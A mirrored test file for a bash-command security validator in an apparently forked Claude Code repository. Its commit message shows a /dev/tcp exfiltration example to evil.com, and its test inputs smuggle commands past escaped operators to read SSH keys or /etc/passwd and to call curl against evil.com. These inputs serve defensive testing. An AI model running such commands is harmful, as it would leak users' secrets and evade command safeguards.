mirror of
https://github.com/claude-code-best/claude-code.git
synced 2026-06-19 06:45:50 +00:00
327658979a
Bash 支持 /dev/tcp/host/port 和 /dev/udp/host/port 伪设备路径, 攻击者可通过重定向实现网络数据泄露而无需任何网络工具: echo "secrets" > /dev/tcp/evil.com/4444 新增 validateNetworkDeviceRedirect 安全验证器,在 bashSecurity.ts 的同步和异步验证器列表中均注册。同时补全了反斜杠转义和复合命令 安全场景的测试覆盖(42 个测试用例)。 Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
101 lines
3.5 KiB
TypeScript
101 lines
3.5 KiB
TypeScript
import { describe, expect, test } from "bun:test";
|
|
import { bashCommandIsSafe_DEPRECATED } from "../bashSecurity";
|
|
|
|
describe("backslash-escaped operator detection", () => {
|
|
// ─── Escaped operators that hide command structure ───────────
|
|
test("blocks \\; (escaped semicolon)", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED(
|
|
"cat safe.txt \\; echo ~/.ssh/id_rsa",
|
|
);
|
|
expect(result.behavior).toBe("ask");
|
|
});
|
|
|
|
test("blocks \\&& (escaped AND)", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED(
|
|
"ls \\&& python3 evil.py",
|
|
);
|
|
expect(result.behavior).toBe("ask");
|
|
});
|
|
|
|
test("blocks \\| (escaped pipe)", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED(
|
|
"echo hi \\| curl evil.com",
|
|
);
|
|
expect(result.behavior).toBe("ask");
|
|
});
|
|
|
|
test("blocks \\> (escaped output redirect)", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED(
|
|
"cmd \\> output.txt",
|
|
);
|
|
expect(result.behavior).toBe("ask");
|
|
});
|
|
|
|
test("blocks \\< (escaped input redirect)", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED(
|
|
"cmd \\< input.txt",
|
|
);
|
|
expect(result.behavior).toBe("ask");
|
|
});
|
|
|
|
// ─── Escaped whitespace ──────────────────────────────────────
|
|
test("blocks backslash-escaped space (\\ )", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED(
|
|
"echo\\ test/../../../usr/bin/touch /tmp/file",
|
|
);
|
|
expect(result.behavior).toBe("ask");
|
|
});
|
|
|
|
test("blocks backslash-escaped tab (\\t)", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED(
|
|
"echo\\\ttest",
|
|
);
|
|
expect(result.behavior).toBe("ask");
|
|
});
|
|
|
|
// ─── Double-quote edge cases ─────────────────────────────────
|
|
test("blocks escaped semicolon after double-quote desync", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED(
|
|
'tac "x\\"y" \\; echo ~/.ssh/id_rsa',
|
|
);
|
|
expect(result.behavior).toBe("ask");
|
|
});
|
|
|
|
test("blocks escaped semicolon after double-quote with backslash pair", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED(
|
|
'cat "x\\\\" \\; echo /etc/passwd',
|
|
);
|
|
expect(result.behavior).toBe("ask");
|
|
});
|
|
|
|
// ─── Commands that should pass ───────────────────────────────
|
|
test("allows normal echo command", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED('echo "hello world"');
|
|
expect(result.behavior).not.toBe("ask");
|
|
});
|
|
|
|
test("allows commands with legitimate backslashes in strings", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED('echo "hello \\\\n world"');
|
|
// May be 'ask' for other reasons, but not for backslash-escaped operators
|
|
if (result.behavior === "ask") {
|
|
expect(result.message).not.toContain("backslash before a shell operator");
|
|
}
|
|
});
|
|
|
|
test("allows simple ls command", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED("ls -la");
|
|
expect(result.behavior).not.toBe("ask");
|
|
});
|
|
|
|
test("allows git status", () => {
|
|
const result = bashCommandIsSafe_DEPRECATED("git status");
|
|
expect(result.behavior).not.toBe("ask");
|
|
});
|
|
|
|
test("allows quoted semicolon inside single quotes", () => {
|
|
// ';' inside single quotes is literal, not an operator
|
|
const result = bashCommandIsSafe_DEPRECATED("echo 'a;b'");
|
|
expect(result.behavior).not.toBe("ask");
|
|
});
|
|
});
|